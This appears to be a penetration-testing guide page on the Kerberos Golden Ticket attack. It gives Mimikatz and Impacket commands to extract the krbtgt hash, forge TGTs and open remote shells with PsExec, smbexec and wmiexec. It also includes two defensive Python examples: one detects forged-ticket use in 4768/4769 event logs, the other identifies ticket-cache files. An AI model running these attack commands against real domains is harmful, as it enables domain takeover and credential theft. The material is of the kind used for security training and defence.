# Golden Ticket with krbtgt

Requirements:

* Environment: a domain controller
* This attack assumes a Domain Controller compromise in which the `KRBTGT` account hash is extracted; that hash is the requirement for a successful Golden Ticket attack.

<https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket>

{% hint style="info" %}
A **Golden Ticket** attack consists of the **creation of a valid Ticket Granting Ticket (TGT) impersonating any user** through the use of the **NTLM hash of the Active Directory (AD) krbtgt account**. This technique is particularly advantageous because it **enables access to any service or machine** within the domain as the impersonated user. It's crucial to remember that the **krbtgt account's credentials are never automatically updated**.

To **acquire the NTLM hash** of the krbtgt account, various methods can be employed. It can be extracted from the **Local Security Authority Subsystem Service (LSASS) process** or from the **NT Directory Services (NTDS.dit) file** located on any Domain Controller (DC) in the domain. Furthermore, **executing a DCSync attack** is another way to obtain this NTLM hash, using tools such as the **lsadump::dcsync module** in Mimikatz or the **secretsdump.py script** from Impacket. It's important to underscore that **domain admin privileges or a similar level of access is typically required** to undertake these operations.
{% endhint %}
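The mechanism above has a direct detection consequence: a forged TGT is minted offline from the krbtgt hash, so no domain controller ever logs a TGT request (event 4768) for it; the first trace is a service-ticket request (event 4769) presenting a TGT the DC never issued. The following is an added example (not code from this page, Mimikatz or Impacket) that applies that idea plus two supporting heuristics to constructed event records. The field names (`account`, `client_ip`, `etype`, `service`) are assumptions standing in for a SIEM's flattened view of the 4768/4769 XML, and the sample events and account list are constructed, not real logs.

```python
"""Heuristics for spotting forged-TGT use in Windows Security events 4768/4769.

A Golden Ticket never produces a 4768 on any DC, so a 4769 with no preceding
TGT request for the same client is the primary signal. Two supporting signals:
the impersonated account may not exist in the directory at all (this page
forges "newAdmin"), and RC4 ticket encryption (etype 0x17) stands out in a
domain where AES (0x11/0x12) is the norm.
"""
from datetime import datetime, timedelta

# Constructed sample records (assumption: a SIEM has flattened the event XML
# into these simplified keys). Times are ISO 8601 so they sort lexically.
SAMPLE_EVENTS = [
    {"event_id": 4768, "time": "2024-05-01T09:00:00", "account": "alice",
     "client_ip": "10.0.0.5", "etype": "0x12"},
    {"event_id": 4769, "time": "2024-05-01T09:00:05", "account": "alice",
     "client_ip": "10.0.0.5", "service": "cifs/dc01", "etype": "0x12"},
    # bob got a real TGT, but the service ticket is requested ~23 hours later,
    # well past the default 10-hour TGT lifetime.
    {"event_id": 4768, "time": "2024-05-01T09:00:00", "account": "bob",
     "client_ip": "10.0.0.9", "etype": "0x12"},
    {"event_id": 4769, "time": "2024-05-02T08:00:00", "account": "bob",
     "client_ip": "10.0.0.9", "service": "cifs/fs01", "etype": "0x12"},
    # Service ticket for an account that never requested a TGT and does not exist.
    {"event_id": 4769, "time": "2024-05-01T09:10:00", "account": "newAdmin",
     "client_ip": "10.0.0.77", "service": "cifs/dc01", "etype": "0x17"},
]

# Constructed snapshot of sAMAccountNames that exist in the directory.
KNOWN_ACCOUNTS = {"alice", "bob", "administrator"}

# Default domain policy "Maximum lifetime for user ticket" is 10 hours.
MAX_TICKET_AGE = timedelta(hours=10)
RC4_ETYPE = "0x17"


def find_suspicious_tgs(events, known_accounts, max_ticket_age=MAX_TICKET_AGE):
    """Return 4769 events that look like they were backed by a forged TGT.

    Each finding lists the heuristics that fired: one reason alone is weak,
    several together are a strong indicator worth an incident.
    """
    known = {a.lower() for a in known_accounts}
    ordered = sorted(events, key=lambda e: e["time"])
    last_tgt = {}  # (account, client_ip) -> datetime of most recent 4768
    findings = []
    for ev in ordered:
        when = datetime.fromisoformat(ev["time"])
        key = (ev["account"].lower(), ev["client_ip"])
        if ev["event_id"] == 4768:
            last_tgt[key] = when
            continue
        if ev["event_id"] != 4769:
            continue
        reasons = []
        issued = last_tgt.get(key)
        if issued is None:
            reasons.append("no_tgt_request")         # no DC issued a TGT to this client
        elif when - issued > max_ticket_age:
            reasons.append("tgt_older_than_policy")  # a real TGT would have expired
        if ev["account"].lower() not in known:
            reasons.append("unknown_account")        # impersonated user does not exist
        if ev.get("etype") == RC4_ETYPE:
            reasons.append("rc4_ticket")             # RC4 downgrade typical of /rc4: forgeries
        if reasons:
            findings.append({"account": ev["account"], "client_ip": ev["client_ip"],
                             "service": ev.get("service"), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious_tgs(SAMPLE_EVENTS, KNOWN_ACCOUNTS):
        print(finding)
```

The "no TGT request" check is only trustworthy when 4768 events from every domain controller are collected centrally and retained at least as long as the ticket lifetime, since the 4769 may be served by a different DC than the one that would have issued the TGT; the unknown-account and RC4 checks do not depend on that correlation.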

Sample command to extract the krbtgt account hash:

```
mimikatz # lsadump::lsa /inject /name:krbtgt
```

<figure><img src="/files/ulw3tjDDtsgf8JOr1pzE" alt=""><figcaption><p><a href="https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution">https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution</a></p></figcaption></figure>

## Golden Ticket Attack from Windows

Inject the golden ticket into memory:

```
mimikatz # kerberos::golden /domain:offense.local /sid:S-1-5-21-4172452648-1021989953-2368502130 /rc4:8584cfccd24f6a7f49ee56355d41bd30 /user:newAdmin /id:500 /ptt
```

<figure><img src="/files/gsiZVrpR5OJIV6HW9w3K" alt=""><figcaption><p><a href="https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution">https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution</a></p></figcaption></figure>

Check the ticket with `klist`.

**Once** the **Golden Ticket is injected**, you can access the shared files **(C$)** and execute services and WMI, so you can use **psexec** or **wmiexec** to obtain a shell (it appears you cannot get a shell via WinRM).

Switching back to the console the attacker used to create the golden ticket (local admin) and again attempting to access the `c$` share of the domain controller, this time it succeeds:

<figure><img src="/files/Jifpp55w31lk7FdrJAJg" alt=""><figcaption><p><a href="https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution">https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution</a></p></figcaption></figure>

Or execute `cmd` on the remote machine with PsExec:

```
.\PsExec.exe -accepteula \\<remote_hostname> cmd
```

References:

<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-golden-tickets#execution>\
<https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket>

## Golden Ticket Attack from Linux

Requirements:

* krbtgt hash

<figure><img src="/files/7BXKv9MbzyehyLtzZ5KY" alt=""><figcaption></figcaption></figure>

* Domain SID

```
# ActiveDirectory PowerShell module (PowerView equivalent: Get-DomainSID)
# the DomainSID field of the output is the value needed below
Get-ADDomain <domain_name>
```

<figure><img src="/files/htFkcxYGZERG2NmAk1TA" alt=""><figcaption></figcaption></figure>

```
#impacket

# generate the TGT with the krbtgt NTLM hash
impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> NewAdmin

# generate the TGT with the krbtgt AES key
impacket-ticketer -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> NewAdmin

# point impacket at the forged TGT (ticketer saves it as <user>.ccache, here NewAdmin.ccache)
export KRB5CCNAME=<TGT_ccache_file>

# execute a remote command with any of the following using the TGT
# (<user_name> must match the user the ticket was forged for)
impacket-psexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
```

{% hint style="info" %}
Use the hostname rather than the IP address of the remote server: Kerberos service tickets are issued for an SPN (e.g. `cifs/<hostname>`), so a request addressed to an IP will not match the ticket.
{% endhint %}

{% hint style="info" %}
"Kerberos SessionError: KRB\_AP\_ERR\_SKEW(Clock skew too great)"

This means the date/time of the Kali Linux machine and the remote machine differ: Kerberos authentication with a TGT is time-sensitive (the default tolerance is 5 minutes).

Solve with this:

`sudo ntpdate $IP`
{% endhint %}

## Convert TGT between Windows and Linux Formats

<https://github.com/Zer1t0/ticket_converter>

To convert tickets between the Linux and Windows formats with [ticket\_converter.py](https://github.com/Zer1t0/ticket_converter):

```
python ticket_converter.py ticket.kirbi ticket.ccache
python ticket_converter.py ticket.ccache ticket.kirbi
```
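The two formats the converter bridges are the DER-encoded KRB-CRED that Mimikatz writes as `.kirbi` and the credential cache (ccache) used by MIT/Heimdal tools and Impacket. When a ticket file turns up on a host during triage, the first questions are which format it is and which principal it claims to hold. The following is an added example (not code from this page or from ticket_converter) that classifies a file by its leading bytes and reads the default principal out of a v3/v4 ccache; it stops after the principal block (assumption: the credentials that follow are not needed for this triage step), and the `build_ccache_prefix` fixture is constructed test input, not a real ticket.

```python
"""Classify recovered ticket files and read the principal a ccache claims.

ccache files begin with 0x05 followed by the format version; v3 and v4 use
big-endian fields, and v4 inserts a tagged header before the default
principal. A .kirbi file is a DER KRB-CRED, whose outer tag is
[APPLICATION 22] constructed, i.e. the byte 0x76.
"""
import struct


def identify_ticket_file(blob: bytes) -> str:
    """Return 'ccache', 'kirbi' or 'unknown' based on the leading bytes."""
    if len(blob) >= 2 and blob[0] == 0x05 and blob[1] in (1, 2, 3, 4):
        return "ccache"
    if blob[:1] == b"\x76":
        return "kirbi"
    return "unknown"


def _read_counted(blob: bytes, off: int):
    """Read a big-endian uint32 length followed by that many bytes."""
    (n,) = struct.unpack_from(">I", blob, off)
    off += 4
    return blob[off:off + n], off + n


def ccache_default_principal(blob: bytes) -> str:
    """Return 'comp1/comp2@REALM' from the default principal of a v3/v4 ccache."""
    if identify_ticket_file(blob) != "ccache":
        raise ValueError("not a ccache file")
    version = blob[1]
    if version not in (3, 4):
        raise ValueError(f"ccache version {version} uses native byte order; not handled")
    off = 2
    if version == 4:
        # v4 header: uint16 total length, then (tag, length, data) fields,
        # e.g. tag 1 = DeltaTime. We skip it entirely.
        (hlen,) = struct.unpack_from(">H", blob, off)
        off += 2 + hlen
    _name_type, ncomp = struct.unpack_from(">II", blob, off)
    off += 8
    realm, off = _read_counted(blob, off)
    comps = []
    for _ in range(ncomp):
        comp, off = _read_counted(blob, off)
        comps.append(comp.decode())
    return "/".join(comps) + "@" + realm.decode()


def build_ccache_prefix(realm: str, components, version: int = 4) -> bytes:
    """Constructed fixture: a ccache up to and including its default principal."""
    out = bytes([0x05, version])
    if version == 4:
        header = struct.pack(">HH", 1, 8) + struct.pack(">ii", 0, 0)  # DeltaTime 0s/0us
        out += struct.pack(">H", len(header)) + header
    out += struct.pack(">II", 1, len(components))  # name type NT-PRINCIPAL = 1
    out += struct.pack(">I", len(realm)) + realm.encode()
    for comp in components:
        out += struct.pack(">I", len(comp)) + comp.encode()
    return out


if __name__ == "__main__":
    sample = build_ccache_prefix("OFFENSE.LOCAL", ["NewAdmin"])
    print(identify_ticket_file(sample), ccache_default_principal(sample))
```

A principal such as `NewAdmin@OFFENSE.LOCAL` in a cache on a workstation, where no such account exists in the directory, is exactly the artifact the forged-ticket procedure above leaves behind; comparing the cache's principal against the directory is a cheap first check before any deeper ticket analysis.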
